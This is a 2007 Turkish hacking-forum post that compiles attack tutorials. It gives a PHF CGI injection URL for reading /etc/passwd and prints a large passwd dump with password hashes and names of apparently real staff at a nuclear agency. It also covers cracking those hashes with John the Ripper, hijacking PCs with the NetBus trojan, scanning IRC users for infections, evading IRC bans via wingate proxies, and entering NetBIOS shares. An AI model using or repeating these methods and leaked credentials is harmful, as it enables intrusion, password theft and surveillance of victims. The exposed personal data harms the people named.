THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

dünyayı hackle

hackedby38 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
12/2006
Mesajlar:
132
Konular:
40
Teşekkür (Etti):
0
Teşekkür (Aldı):
1
Ticaret:
(0) %
25-01-2007 13:04
#1
dünyayı hackle
WEB hacking Buyrun By End and By Yutah
bilgidim kadari ile ilk kez 1996 da FBI in web sitesini hack etmek icin
kullanilmis ve basarili olmustur. Tabi bu durum dan sonra FBI bu
hatasini gidermistir. Anlatacagim teknik aslinda PHF olarak bilinir.Fakat
bir cok eski server da hala uygulanmakta ve netice alinabilmektedir
ozellikle japon webcilerinde bu hataya cok rastlanilir ornek vermek
gerekirse:

http://www.mo.cs.tutsiki.ac.jp/cgi-bin/phf? Qalias=x%0a/bin/cat%20/etc/passwd">http:// www.mo.cs.tutsiki.ac.jp/cgi-bin/phf?Qalias=x%0a/ bin/cat%20/etc/passwd

http://www.mo.cs.tutsiki.ac.jp/cgi-bin/phf? Qalias=x%0a/bin/cat%20/etc/passwd">cat%20/etc/ passwd

Satirini
browserinize yazip enter e basin bu satir passwd dosyasini acmaya
calisacaktir(adresi attim)

Error
404

/cgi-bin/phf
is not found on this server

Bu satirlar
karsiniza cikarsa bilinki server yeni ve size gecit
vermiyor

Ama asagidaki
listeyi verirse bilinki buldunuz ))

/cgi/phf?Qalias=x%0a/bin/cat%20/etc/
passwd

root:2fkbNba29uWys:0Operator:/:/
bin/csh

www-admin:rYsKMjnvRppro:100WWW
administrator:/home/Common/WWW:/bin/csh

asprilla:3A62i9qr.YmO.:1012 lyutah

CAFER:/home/user/asprilla:/usr/
local/bin/tcsh

hasan:dvUMqNmeeENFs:1016lois
figo:/home/user/hasan:/bin/csh

necmettin:ewF90K0gwXVD6:1006: 10:mehmet
CAFER:/home/user/cafer:/bin/csh

güloglu:kFph8HEM/aaAA:1007Kemal
GULOGLU:/home/user/güloglu:/bin/csh

PHF teknigini
arkadaslarinizin web page larini hack etmek icin deniye bilirsiniz ))
tabi yukardaki satirlari en iyi ihtimali goz onune alinarak
yazdim PHF bulsaniz bile muhtemelen shadow olacaktir yani asagidaki
gibi:

root:*:0Operator:/:/bin/csh

www-admin:*:100WWW
administrator:/home/Common/WWW:/bin/csh

asprilla:*:1012CAFER:
/home/user/asprilla:/usr/local/bin/tcsh

hasan:*:1016lois
figo:/home/user/hasan:/bin/csh

necmettin:*:1006mehmet
CAFER:/home/user/cafer:/bin/csh

güloglu:*:1007kemal
GULOGLU:/home/user/güloglu:/bin/csh

Bu tek *
sifreleri kirdigini iddia eden bazi programlar var ama ben sadece
guluyorum shadowed kirmak bence imkansiz ama yinede john the ripper i
cekip deneyebilirsiniz.Hic bir teknik % 100 netice vermez bunu
unutmayin.olaki bir shell aldiniz veya kirdiniz diyelim en az
kullanilanini kullanin en son ne zaman kullanildigini anlamak icin shell
in ait oldugu servere port 79 dan baglanin username ve pw i yazin en son
baglanilan tarihi size verir az kullanilan accountlari
kullanin




SERVERLARI SASIRTMAK

Simdi size bir serveri nasil cildirtirsiniz onu anlaticam

Olaya gavurlar PORT SURF diyolar ...nedir yaw bu port surf??
Annatiim imdi internete bagli her tip makinanin iletisim (data transferi)
yapabilmesi icin cesitli portlar kullandigini biliyorsunuz(en azindan
ogrendiniz)bu portlar internete aciladn gediklerdir aslinda.

Baazi portlar ve islevleri:

PORT23 log icin kullanilir

PORT25 e-mail yollamak icin

PORT80 web sayfalari icin

Tamam bu kadar bilgi yeter sanirim cunku saymakla bitmez nesse nediyoduk
hah port surf iste size nasil yapilir onu anlatacam.

BÖLÜM 1 FIREWALL tespiti

DOS u acin ve

C:WINDOWS>tracert 152.163.199.42 (bu ip serverin ip si olmali ben
salladim)

Tracing route to dns-01.aol.com [152.163.199.42]over a maximum of 30
hops:

1 * * * Request timed out.

2 150 ms 144 ms 138 ms 204.134.78.201

3 375 ms 299 ms 196 ms essek-cyberport.nm.westnet.net [204.134.78.33]

4 271 ms * 201 ms raks365.nm.org [129.121.1.3]

5 229 ms 216 ms 213 ms h4-0.cnss116.Turknet.t3.ans.net[192.103.74.45]

6 223 ms 236 ms 229 ms f2.t112-0.Gediz.t3.ans.net[140.222.112.221]

7 248 ms 269 ms 257 ms h14.t64-0.Izmir.t3.ans.net [140.223.65.9]

8 178 ms 212 ms 196 ms h14.t80-1.raks.net [140.223.65.14]

9 316 ms * 298 ms h12.t60-0.raks.net [140.223.61.9]

10 315 ms 333 ms 331 ms 207.25.134.18

11 * * * Request timed out.

12 * * * Request timed out.

13 207.25.134.189 reports: Destination net unreachable.

Gibi bi tablo karsimza cikicak .Tablo serverlar zincirini bize gosteriyo
bakin 13.Server varya iste o serveri tanimlayamadi nedeni muhtemelen
firewall

Bu demektirki ayni firmanin(orn superonline)bir baska serverini
deniicez.Yalniz dikkat edilmesi gereken husus sinyal yolculugumuzun hangi
serverda bittigi hep ayni server da bitiyosa bu demektirki bu server ana
server dir

Ikinci servere da tracert alalim

C:WINDOWS>tracert 198.83.210.28

Tracing route to dns-aol.ans.net [198.83.210.28]over a maximum of 30
hops:

1 * * * Request timed out.

2 138 ms 145 ms 135 ms 204.134.78.201

3 212 ms 191 ms 181 ms turk.net [204.134.78.33]

4 166 ms 228 ms 189 ms raks365.nm.org [129.121.1.3]

5 148 ms 138 ms 177 ms h4-0.cnss116.gediz.t3.ans.net [192.103.74.45]

6 284 ms 296 ms 178 ms f2.t112-0.Izmir.t3.ans.net [140.222.112.221]

7 298 ms 279 ms 277 ms h14.t64-0.Istanbul.t3.ans.net [140.223.65.9]

8 238 ms 234 ms 263 ms h14.t104-0.raks.t3.ans.net [140.223.65.18]

9 301 ms 257 ms 250 ms dns-raks.net [198.83.210.28]

Trace complete.

Hehehe bakin bunda firewall falan yok hohohoyt temiz ve bakire(Isilay
Saygin gibi) simdiiii sira geldi PORTSURF a....

Simdi telnetlerinizi acacaksiniz ve preferences te local echo kismini
tikleyin baglanti olarak (yukardaki ornege gore 198.83.210.2yazin(echo
tiklanmazsa win95 telnet ekraninda bisii goremezsiniz)

Connect remote sysstemde telnet yazan menude daytime yi secin ve connect
olun size tarih saat ve zamani bildiren bir msg gelicek tabbiki serverin
bash history sine kaydiniz gecicek sysadmin oha noluyo lam onune gelen
bizim servere girmis diicek

Hahahaha adami cildirttiniz be ...

Daha ileri ve tehlikeli safhalarda port surf yapmak mumkun anlatirmiyim
bilemiyorum cunku bu isler basinizi agritbilir benden soolemesi
vallaaaa(anlatacam) ))





Password Kýrma

Herhangi bir ftp veya
..... gibi yerlere girilirken kullanýlan þifreler passwd
dosyasýna alegoritmatik bir þekilde
kayýtlýdýr.Bu passwd dosyalarý ftp'nin veya
....'nýn içinde bulunurlar.Ýþte bu da çok büyük bir
güvenlik boþluðu meydana getirdiðinden dünyadaki çoðu
hackerlar,crackerlar..... bu güvenlik boþluðundan yararlanarak
kolay bir þekilde istediklerine ulaþabilirler.


Passwd
mantýðý nedir?

Herhangi bir passwd
dosyasýnýn içeriðine (edit,view)
baktýðýmýzda aþaðýdaki gibi bir
metin görürüz:



root:U5SNZk2JeFyqc:0:0: root:/root:/bin/bash
bin:*1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4lp:/var/spool/lpd:
sync:*:5:0 ync:/sbin:/bin/sync
shutdown:*:6:0 hutdown:/sbin:/sbin/shutdown
halt:*0:halt:/sbin:/sbin/halt
mail:*12:mail:/var/spool/mail:
news:*13:news:/usr/lib/news:
uucp:*14:uucp:/var/spool/uucppublic:
operator:*0perator:/root:/bin/bash
man:*:13man:/usr/man:
postmaster::14:12 ostmaster:/var/spool/mail:/bin/bash
cans:/uyl4V8zixlaE:501:220 evket Can:/home/nyt/cans:/bin/bash
canf nNSukj82XXEA:502:220:Ferhan CAN:/home/nyt/canf:/bin/bash
adem:F.3SJTjMEDcpU:503:240:Adem Erdogan:/home/num/adem:/bin/bash
gurelil RABgVdC.Z2JA:504:220:Lutfiye Gureli:/home/nyt/gurelil:/bin/bash
acarkans:uddbZ9Mx98iKY:505:220 uheyla
Acarkan:/home/nyt/acarkans:/bin/bash
bekdemir nP07pY6gxPvQ:506:220:Nigar
Bekdemir:/home/nyt/bekdemir:/bin/bash
ayberst:HbDYSOFSXo83k:507:220:Timucin Aybers:/home/nyt/ayberst:/bin/bash
kopuzb:JdYc5r.nfGaEY:508:220:Bayram Kopuz:/home/nyt/kopuzb:/bin/bash
aksita:Agisok05JXRrI:509:220:Ahmet A. Aksit:/home/nyt/aksita:/bin/bash
cimcimk:Ai8r6m1xPcmMw:510:220:Kasif Cimcim:/home/nyt/cimcimk:/bin/bash
tanzer:FnlWFqrYfvVeo:511:240:Tanzer Turker:/home/num/tanzer:/bin/bash
erkoly:Nc.Hq472OXz8k:513:230:Yilmaz Erkol:/home/kim/erkoly:/bin/bash
nyt:A04MMiSSbfAB2:514:220:NYT Bolumu Resmi:/home/nyt/nyt:/bin/bash
borakf:GagTSqeRGJV.c:516:200:Fahir Borak:/home/cnaem/borakf:/bin/bash
uzmenr:0mZJYiyceKJeo:517:200:Resat Uzmen:/home/cnaem/uzmenr:/bin/bash
yaylia:Jm9S5MLXd/R2M:521:220:Ahmet YAYLI:/home/nyt/yaylia:/bin/bash
ozaly:FfGyZIHjOqcoU:522:200:Yasar OZAL:/home/cnaem/ozaly:/bin/bash
yasars:KizDcrryIQhzc:523:270 edat YASAR:/home/saf/yasars:/bin/bash
koksalg:GlDNRAsIGNjWQ:524:290:Guler KOKSAL:/home/rbi/koksalg:/bin/bash
taylans:JnwMm9uPt76Rs:525:210 inan TAYLAN:/home/rea/taylans:/bin/bash
anach:WDkDAsL9FHR/U:526:210:Hakan ANAC:/home/rea/anach:/bin/bash
akgunf:MiNaiGGyR1JG6:527:280:Fadil Akgun:/home/end/akgunf:/bin/bash
subasim:AndMbHdgb5H9.:529:300:Metin Subasi:/home/fiz/subasim:/bin/bash
sungura:JoSjnOjcZqCtM:530:250:Ayse Sungur:/home/rif/sungura:/bin/bash
albayrak:IQJwi/qu0jTo2:531:220 erhan
Albayrak:/home/nyt/albayrak:/bin/bash
onera:Jbhdc51wn/WPw:532:201:Aysegul Oner:/home/cnaem/onera:/bin/bash
bayramy:AlZcxvhIRl6Xw:534:220:Yusuf Bayram:/home/nyt/bayramy:/bin/bash
koksalm:InYyYaGxOichA:535:270:Muhsin Koksal:/home/saf/koksalm:/bin/bash
vakif:cc:536:400:TAEK VAKFI:/home/taek/vakif:/bin/bash
seddighe:OgvuVQiGD/OGw:537:280:Emine Seddigh:/home/end/seddighe:/bin/bash
esenn GHW2392T48kw:538:280:Nur Esen:/home/end/esenn:/bin/bash
yildizi:FfCwQga4b/LvY:539:220:Izzettin YILDIZ:/home/nyt/yildizi:/bin/bash
basolt:MoXAnj2yuDVCg:540:310:Toygun Basol:/home/nel/basolt:/bin/bash
bodurn alDk8NzbfdoU:541:250:Nazan Bodur:/home/rif/bodurn:/bin/bash
bostanm:RSXR9GDBlOBTE:542:300:Melih Bostan:/home/fiz/bostanm:/bin/bash
celebin:8QfdEi0/2EZv2:543:270:Nilgun Celebi:/home/saf/celebin:/bin/bash
dincerb:Ei11tpbbK9ops:544:230:Betul Dincer:/home/kim/dincerb:/bin/bash
gultekin:J6faQXLhHvNEw:545:300:Ergun
Gultekin:/home/fiz/gultekin:/bin/bash
gungore:JkYdRn2X6ivv2:546:270:Emin Gungor:/home/saf/gungore:/bin/bash
sahinh:mNnEblEi8oVz.:547:201:Hasan Sahin:/home/cnaem/sahinh:/bin/bash
ozturkn:Bd8dnZQjzddrk:548:230:Neset Ozturk:/home/kim/ozturkn:/bin/bash
reyhanca:KGcikUdVikuvs:549:300:Atilla
Reyhancan:/home/fiz/reyhanca:/bin/bash
ngd:nn:550:400:Nukleer Guvenlik Dairesi:/home/taek/ngd:/bin/bash
anaem:ccc:551:400:ANAEM:/home/taek/anaem:/bin/ bash
erduran:NgEavV94BD9VY:552:300:Nizamettin
Erduran:/home/fiz/erduran:/bin/bash
nhtg xx:553:400:NHTG:/home/taek/nhtg:/bin/bash
rgd:zzz:554:400:RGD:/home/taek/rgd:/bin/bash
cnaem:ccc:555:200:CNAEM:/home/cnaem/cnaem:/bin/ bash
apakv:CpYe0oeGMCOdI:556:230:Vildan Apak:/home/kim/apakv:/bin/bash
bayulken:OcxNbtUuOttak:512:230 eval
Bayulken:/home/kim/bayulken:/bin/bash
ardagiln:BcclwAyDgYkYs:515:230:Nesrin
Ardagil:/home/kim/ardagiln:/bin/bash
karakell gPmJbKoo/0TU:518:230:Bektas
Karakelle:/home/kim/karakell:/bin/bash
unala:HkbDXjJ3vJpV6:519:230:Unal Azakliogullari:/home/kim/unala:/bin/bash
yilmazy pR/oJRp7PERQ:520:230:Yusuf Z. Yilmaz:/home/kim/yilmazy:/bin/bash
tekd:bbb:528:400:TAEK Teknoloji Dairesi:/home/taek/tekd:/bin/bash
necati:GkXn/ae.y8bKs:533:310:Necati
Kucukarslan:/home/nel/necati:/bin/bash
www:987:557:500:www Users:/users/www:/bin/bash
akyols aF5UBFvEr7Bw:558:210 evgi AKYOL:/home/rea/akyols:/bin/bash
ozcinarbd48qQhIJs0kA:560:270:Berna OZCINAR:/home/saf/ozcinarb:/bin/bash
sevdikb:OecxtOT03rKMA:561:210:Bulent Sevdik:/home/rea/sevdikb:/bin/bash
incem:IiYBQEI0ZpcOY:562:300:Mehmet Zeki Ince:/home/fiz/incem:/bin/bash
kahraman:FS2OPYtiw49L6:563:270:Alper
Kahraman:/home/saf/kahraman:/bin/bash
varinlia:GfmjacT6ct6Fw:564:290:Ahmet
Varinlioglu:/home/rbi/varinlia:/bin/bash
altunh:5csmkn3uoCpyg:565:270:Hasret ALTUNKAYA:/home/saf/altunh:/bin/bash
yilmazf:IE.EN2vUu41HU:566:270:Fatma YILMAZ:/home/saf/yilmazf:/bin/bash
kutd:Fc7lvTDNhJYYQ:567:280 eniz KUT:/home/end/kutd:/bin/bash
tacacs anHMVraPXPA.:1500:400::/home/tacacs:/bin/bash
admin R0HTvLEIhtSM:1499:0:Administrator:/home/admin:/ bin/bash
arpadt:OivHOGPoX1IAU:570:270:Tulin ARPAD:/home/saf/arpadt:/bin/bash
vurale:HjNyW9EI.woao:569:210:Ertac VURAL:/home/rea/vurale:/bin/bash
isyara:OlYWR.EcdVdKU:571:210:Arif ISYAR:/home/rea/isyara:/bin/bash
uzonuro:AaABahtiOEo6A:572:210:Onur UZONUR:/home/rea/uzonuro:/bin/bash
yilmazer:NdQM4Rux/7iT2:210:210:Ayhan
YILMAZER:/home/rea/yilmazer:/bin/bash
bahcecig:AhfABAP0XgS0k:573:210:Gulfem
BAHCECI:/home/rea/bahcecig:/bin/bash
koth:AjVcf4ywDlr3w:574:210:Halil KOT:/home/rea/koth:/bin/bash
elberk:IlBiB9Glgycn.:575:210:Kamil ELBER:/home/rea/elberk:/bin/bash
yasard:VvVMMfuQ4cMRM:576:270 ogan YASAR:/home/saf/yasard:/bin/bash
nyts97:7U3sUENdky6JU:577:220:NUKLEER YAKIT
SEMPOZYUMU:/home/nyt/nyts97:/bin/bash
yoneticiLSMMkABUJ7ic:0:0:Bilgisayar Yoneticisi:/root:/bin/bash
gungorn:dnwkv/5qByrG.:568:290:Nurdan GUNGOR:/home/rbi/gungorn:/bin/bash
bingolda:76l9JUAaRzDoo:578:280:Murat
BINGOLDAG:/home/end/bingolda:/bin/bash
can:LfbBn4bgycs7o:559:100 evket Can:/home/can:/bin/bash
saricams NNbo8vGVmu3Y:579:280 erdar
SARICAM:/home/end/saricams:/bin/bash
bassaria:AfgztlGy2RQJs:580:280:Asiye BASSARI:/home/end/bassaria:/bin/bash
webadmin:Hc5/aIVU/XuuE:581:500:WEB ADMINISTER:/home/webadmin:/bin/bash
ekincis:CjiBia7MbWbs.:582:280 inasi EKINCI:/home/end/ekincis:/bin/bash
aksum:EjFB5hSVLq7Nk:583:280:Mehmet AKSU:/home/end/aksum:/bin/bash
akyuzt:ChgnRmxYcdEuc:584:280:Tanil AKYUZ:/home/end/akyuzt:/bin/bash
karahang:GgJGJA8ospSqU:585:270:Gursel
KARAHAN:/home/saf/karahang:/bin/bash
topcuo:NibHkZNNL/IH6:587:290 ayhan TOPCUOGLU:/home/rbi/topcuo:/bin/bash
kurtcebe:Jk/kUfYoDiUP6:588:280:Tekin
KURTCEBE:/home/end/kurtcebe:/bin/bash
ozturkh:AeyVxXMofhxoU:589:310:Hamza OZTURK:/home/nel/ozturkh:/bin/bash
dogruozm:CjKo7YL/IvXZo:590:280:Mustafa
DOGRUOZ:/home/end/dogruozm:/bin/bash
karainci m3sh7Ih56T7Y:591:280:Nihat
KARAINCI:/home/end/karainci:/bin/bash
info:Bjt9LmUnKpWr6:592:100:CNAEM Information:/home/cnaem/info:/bin/bash
cezzar:Eg/sn2Q/pXsCg:593:290:Rezzan
KUCUKCEZZAR:/home/rbi/cezzar:/bin/bash
tasdelen:A2afZOosjl7xk:594:270:Muslum
TASDELEM:/home/saf/tasdelen:/bin/bash
kocakm:eV51wNMJ9CpM2:595:270:Mehmet KOCAK:/home/saf/kocakm:/bin/bash


-----------------

Yukarýdaki metinden alýnmýþ
rasgele bir satýrýn açýklamasý :


Örnek satýr :
canf nNSukj82XXEA:502:220:Ferhan CAN:/home/nyt/canf:/bin/bash


Kullanýcý
adý(user) : canf
Kodlanmýþ Password : DnNSukj82XXEA
Kullanýcý numarasý : 502:220
Kullanýcý ismi : Ferhan CAN
Dizin : /home/nyt/canf
Türü : /bin/bash

Yukarýda
anlaþýldýðý gibi herþey apaçýk
ortada fakat bir sorun var.O da kodlanmýþ password.Bu kodu
nasýl çözüp de þifreyi alacaksýnýz.Cracker Jack
veya John The Ripper gibi cracker programlarýyla
yapacaksýnýz. Benim tavsiyem John The Ripper
kullanmanýz.Çünkü kullanýmý basittir ))


Not: Bu arada shadowed
denilen bir olay daha vardýr.Bu da aþaðýdaki
gibidir :

Örnek satýr 1 :
canf::502:220:Ferhan CAN:/home/nyt/canf:/bin/bash

Örnek satýr 2 :
canf:*:502:220:Ferhan CAN:/home/nyt/canf:/bin/bash



Kullanýcý adý(user)
KodlanmýþPassword
Kullanýcý no
Kullanýcý ismi Dizin

Türü

canf
; ;
502:220
Ferhan CAN /home/nyt/canf
/bin/bash

canf
;
*

502:220
Ferhan CAN /home/nyt/canf
/bin/bash


Gördüðünüz gibi
kodlanmýþ password bölümü ya boþ
býrakýlarak ya da * ve x iþareti kullanýlarak
gölgelenmiþtir yani shadowed edilmiþtir.Bu tür þifreleri
kýramazsýnýz.

Passwd
dosyalarýný kýrma Tavsiyem John The Ripper olduðu
için bu programýn kullanýmýný
anlatacaðým.

1) Wordlist metodu ile
kýrma

Bu metodla
kýrarken kullandýðýnýz wordlistin içinde
bulunan kelimeler denenir.

Kullanýmý
: john -w:
Örnek : john
passwd.txt -w:words.lst


2)Brute force attack
metodu ile kýrma

Bu metod çok uzun
sürecektir.Çünkü John belirttiðiniz minimum-maximum arasý bütün
kombinasyonlarý deneyecektir. Önce John amcanýn
kýrarken kullandýðý birkaç yöntemi bilelim :




ALL :
Hepsi -
ALPHA : Sadece harfler
-
DIGITS : Sadece
rakamlar


Not: Türkiye'de
süperonline dýþýndaki bütün isslerde min=4 max=8 hane
olduðundan kýracaðýnýz þifre
süperonline deðilse aþaðýda belirttiðim gibi
yapýn.

Öncelikle John The
Ripper'ýn bulunduðu kalsörün içindeki john.ini
dosyasýný açýn ve bu dosyanýn editine girin.
Ve yukarýda belirttiðim gibi kýrarken kullanmak
istediðiniz yöntemi seçin.Ben þimdi ALL seçtiðinizi
varsayýyorum.John.ini dosyasýnýn editinden ALL
bölümünü bulun.Hemen altýnda MinLen = 1 ve MaxLen = 8 gibi
yazýlar göreceksiniz.Tavsiyem MinLen'i 4 yapmanýz.Adamlar
enayimi 1 haneli þifre koycak ))Gerekli deðiþikliði
yaptýktan sonra kaydedip çýkýn ve ms-dos
satýrýna geçin.Ve daha sonra :



Kullanýmý
: john
kýracaðýnýzdosya -i:kýrmayöntemi

Örnek :
john passwd.txt -i:ALL


3)Single metodu


Bu metodla
kullanýcý adý ve kullanýcý bilgileri
sýrayla kýrýlýr.. Doðum
tarihlerini,isim-soyadlarýnýn çeþitli
kombinasyonlarýný þifre olarak kullananlarý
kýrmak için bu metod þiddetle tavsiye edilir.


Ör =>
Cobratti Sanane : Cobras,Scobra...gibi

Kullanýmý
: john -single

Örnek :
john -single passwd.txt

DÝKKAT!!! : Bütün bu yöntemlerde kýrýlan
þifrelerin diziliþ formatý þöyledir :

password (username) => þifre
(kullanýcý adý





Netbus

Pc sistemlerine girmemizi
saglayan bir program. Backorrifice ve master paradiese kadar çok islevi
olmasa bile basitligi ile oldukça basarili. Programin server dosyasinin
karsi pc de açildikdan sonra pc ye girebilirsiniz. Ama netbus artik çok
duyuldu ve server dosyasi (patch.exe) yi artil herkes icon undan yada
boyutundan taniyor bu yuzden isiniz oldukça zor ilerde netbus un server
dosyasini diger dosyalara bulastirmayi da anlatacagim.
Simdi indirmis oldugunuz netbus paketindeki dosyalari taniyalim
Netbus.exe : Bizim pc ye saldirmak için kullanacagimiz yazilim.
Patch.exe : Karsi pc ye yollanmasi gereken server programi
Host : Listemize kaydetmis oldugumuz, eklemis oldugumuz ip numaralari bu
dosyanin içine yazilir. Ilk aldigiunizda bu dosya olmayacakdir sonradan
olusur.
Temp.jpg: Karsi pc nin o anki goruntusunu screendump yaparak cekmis
oldugumuz resimler ilk olarak boyle kaydedilir. Eger bi sefer yaptikdan
sonra dosyanin yedegini almazsaniz bi sornaki goruntude onun uzerine
yazilir.
Netbusdaki komutlar ve gorevleri
Open Cdrom: Cdrom u açar,kapatir
Show image: Resim dosyalarini gösterir
Swap Mouse: Mouse cursor unu gostermez-geri açar
Start Program: Karsi pcdeki bi programi çalistitir.
Msg Manager: Mesaj Yollarsiniz. (hata mesajlari)
Screendump: O anki karsi pc nin ekran goruntusunu jpg olarak pcnize atar.
Get Info: Patch in nerde oldugu ve karsi pc de kaç kisinin daha oldugunu
gösterir.
Port Redirect: Port u degistirir.
Play Sound: Ses dosyasi çalistirir.
Exit Windows: Windows'u kapatir-Reset attirir-Askiya alir.
Send Text: Mesaj yollamanizi saglar
Active Winds: O anki aktif programlari gosterir.
Mouse pos: Mouse elegecirir..
Listen: Karsidakinin ne yazdigini gösterir
Sound System: Karsi pcnin ses ayarlari ile hasir nesir olabilmek için.
Server Setup: Ayar olayi.
Control Mouse: Mousu ele geçirir.
Go to Url: Sizin istediginiz urlye yollar karsidakini
Key Manager: Klavyeyi kitler-açar
File Manager: Dosya yollamak,almak için
IRC
'DE NASIL BANLANMAZSINIZ IP SPOOOF

Wingate ile IP spoofing
yapin BAN ve K-Line'lardan ve Tabiki Oplardan Korkmayin!!!!
Wingate internet cafelerde, sirketlerde ve bunun gibi bircok bilgisayari
birbirine baglayan yerlerde kullanilan
bir protokoldur. Tabii bizim ilgilendigimiz bolumse wingate'in 23. portu.
Bu 23. portu kullanarak
IRC de Op lar tarafindan BAN'lansek, K-Line koysalar ve hatta Domain
yapsalar bile istedigimiz
kanala rahatca girebiliriz. Wingate' in bir diger ozelligi ise NUKE yeme,
ekranin kararmasina, hattan
dusmeye son veriyo kesinlikle wingate yaptiktan sonra NUKE yemek yok!!!
WinGate>
Ilk yapmamaiz gereken sey once 23. port'u bulan yani bos wingate serverini
bulan WingateScan
programini cekmek. Bu kullanilmasi oldukca basit bir program irc'de
gordugunuz ip'leri buraya yaziyosunuz ve o kendiliginden wingate servery
buluyor
Mesela: Mirc ekraninda Phiber_Optik join zurna from 212.55.66.98' diye
kimin nerden baglandigini
gosteren yazilar gecer hemen burdaki ip numarasini 212.55.66.98 'i
wingateScan progrminda
IP yazan bolume giriyoruz WingateScan programi 212.55.68.00'dan
212.55.66.255' e
kadar olan bolumde wingate serverini arar ve diyelimki 212.55.68.155'te
wingate
buldu assagidaki server found bolumunde hemen cikar!
Mirc'i aciyoruz karsimiza cikan beyaz sayfada
/server 212.55.68.155:23
yaziyoruz ve karsimiza Wingate diye bi yazi cikacak daha sonra yine
bitakim yazilar cikacak
/quote user xxxxx xxxxx [EMAIL="mail@neyazarsanyaz.com [URL="https://tik.lat/1K5dU"] [/U][/URL] Netbus-Detector mirc
addonu

Yukarýda
belirtilenleri temin ettikten sonra ava çýkabiliriz.
Yukarýda belirtilen Netbus-Detector mirc addonunu Chat
programýnýzýn bulunduðu klasöre açýn :
c:mirc (mesela). Daha sonra chat programýnýzý
çalýþtýrýn. Ve status bölümünde
þunlarý yazýn :

/load -rs NetBus.mrc
=> yazýn ve enter'a basýn

/load -rs Net-Aliases.mrc
=> yazýn ve enter'a basýn

/load -rs BusScan.mrc
=> yazýn ve enter'a basýn

Bunlarý her
yazýþýnýzdan sonra

Loaded script
'c:mircnetbus.mrc

gibi bir yazýyla
karþýlaþýrsanýz bu iþ oldu
demektir. Chate girin mesela irc.dal.net'teki #zurna kanalý
olabilir (Kanal ne kadar büyük olursa o kadar iyi olur. Tabi ne kadar
fazla büyük kanala girerseniz o kadar iyi). Þimdi beklemeye
baþlayýn. Neyi mi bekliyorsunuz? Kanala giren
kiþilerden netbus sheepi açýk olanlarýn size teslim
olmasýný. Az önce yüklediðimiz mirc addonun
mantýðý kanala join olan kiþilerin 12345'inci
portunu yoklayýp Netbus açýðý var mý
hýzlý bir þekilde araþtýrmak.
Bulduðunda ise o anki nickiniz size özel açacak ve "Þu kanaldaki
þu host/ip'li kiþide netbus sheepi bulunmuþtur." diyerek
size haber verecek. Sizde hemen ip'yi alacaksýnýz ve
netbusdan baðlanacaksýnýz. O da ne karþý
bilgisayar þifre korumalý. Hemen gaban'ý
çalýþtýrýp þifreyi deðiþtirin.
Daha sonra Netbus'dan tekrar baðlanýn ve
karþýnýza gelen þifre sorusuna az önce
belirttiðiniz þifreyi yazarak bilgisayarýna girin. Bu
kadar basit.
Nbtstat Ile Karsi Pc yi Trojansiz Elegecirmek


Dos komut satirinda
nbtstat -A <IP adresi> komutunu veriyoruz. Basarili Olmussak:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
^M0REBID <00> UNIQUE Registered
VIRTUAL COMPUTE<00> GROUP Registered
^M0REBID <03> UNIQUE Registered
MAC Address = 44-45-53-54-00-00
gibi bir cikti almamiz gerekir. Burada ^MOREBID bilgisayarin ismidir.
Bizim icin önemli olan da bu.
c- Windows dizininin altinda lmhosts isminde bir dosya olusturuyoruz.
("Edit lmhosts" komutuyla) Eger ki daha önceden lmhosts dosyasi varsa bile
yapacagimiz is: x.x.x.x ^MOREBID satirini eklemek (x.x.x.x IP adresi,
^MOREBID bilgisayarin adi)
d- Simdi de dos komut satirinda nbtstat -r komutuyla lmhosts dosyasina
eklediklerimizi networkumuze tanitiyoruz.
e- Simdi Windows'a dönme zamani. Baslat/Bul/Bilgisayarlar menusunden
UNIQUE adini vererek (Yukarida ekran ciktisinda ^MOREBID <00> UNIQUE
Registered satirindaki Unique) bilgisayari aratiyoruz. Bu islemler
yaptiktan sonra bilgisayar bulunuyor. Bilgisayar seklinin uzerine cift
tiklayip harddiskini görebiliyoruz.
Not: Bu olay kirmak istediginiz ana bilgisayarin dosya paylasimina acik
olmasi durumunda calisir.



Bedava Domainmi almak istiyonuz?


&THORN;u s&yacute;ralarda
internette çok popüler olan domain, server... olay&yacute;n&yacute;
anlataca&eth;&yacute;m. E&eth;er internette yo&eth;un olarak
warez,hack,adult tipi sitelere u&eth;ramakta iseniz,sizde bu i&thorn;i
merak ediyorsunuz demektir. Bu yaz&yacute;dan sonra eminim ki
merak&yacute;n&yacute;z büyük ölçüde azalacakt&yacute;r. Warez, hack,
adult tipi siteler a&thorn;&yacute;r&yacute; derecede server
ihtiyac&yacute; duyarlar. Yani bulunduklar&yacute; server ne kadar büyük
olursa o kadar daha fazla program, resim... gibi &thorn;eyler koyarak hit
almak amac&yacute;ndad&yacute;rlar. Günümüzde de domain, server... denen
&thorn;eylerin fiyatlar&yacute; ortadad&yacute;r. &THORN;imdi siz
diyeceksiniz : "Domain server gibi &thorn;eyler pahal&yacute; diyorsun
fakat ortal&yacute;k domainden geçilmiyor. Önüne gelen domain, server
falan alm&yacute;&thorn; bu i&thorn; nas&yacute;l oluyor?".
&Yacute;&thorn;te bizim esas konumuz da budur. Bu adamlar
serverlar&yacute; nas&yacute;l al&yacute;yorlar? Para m&yacute;
veriyorlar? Yoksa ba&thorn;ka bir yol mu var?

1) Yukar&yacute;da
anlatt&yacute;&eth;&yacute;m olay her domain alm&yacute;&thorn; ki&thorn;i
için geçerli de&eth;ildir. Yani kendi paras&yacute;yla warez serveri ya da
domain alm&yacute;&thorn; ki&thorn;iler vard&yacute;r.


2)
A&thorn;a&eth;&yacute;da anlataca&eth;&yacute;m olay&yacute; denemeniz
halinde ba&thorn;&yacute;n&yacute;za gelebileceklerin mesuliyeti tamamen
size aittir.

3) 2.&THORN;&yacute;ktan
korkup da yaz&yacute;y&yacute; okumaktan vazgeçmeyin. Çünkü
a&thorn;a&eth;&yacute;da bu olay&yacute; en güvenli &thorn;ekilde
nas&yacute;l yapilabildi&eth;ini de anlatt&yacute;m. 4) Bedava domain ve
küçük bir server veren yer istiyorsan&yacute;z www.webjump.com ya da
www.hypermart.net adresinden alabilirsiniz. Büyük bir server
istiyorsan&yacute;z a&thorn;a&eth;&yacute;daki yaz&yacute;y&yacute;
okuyunuz.
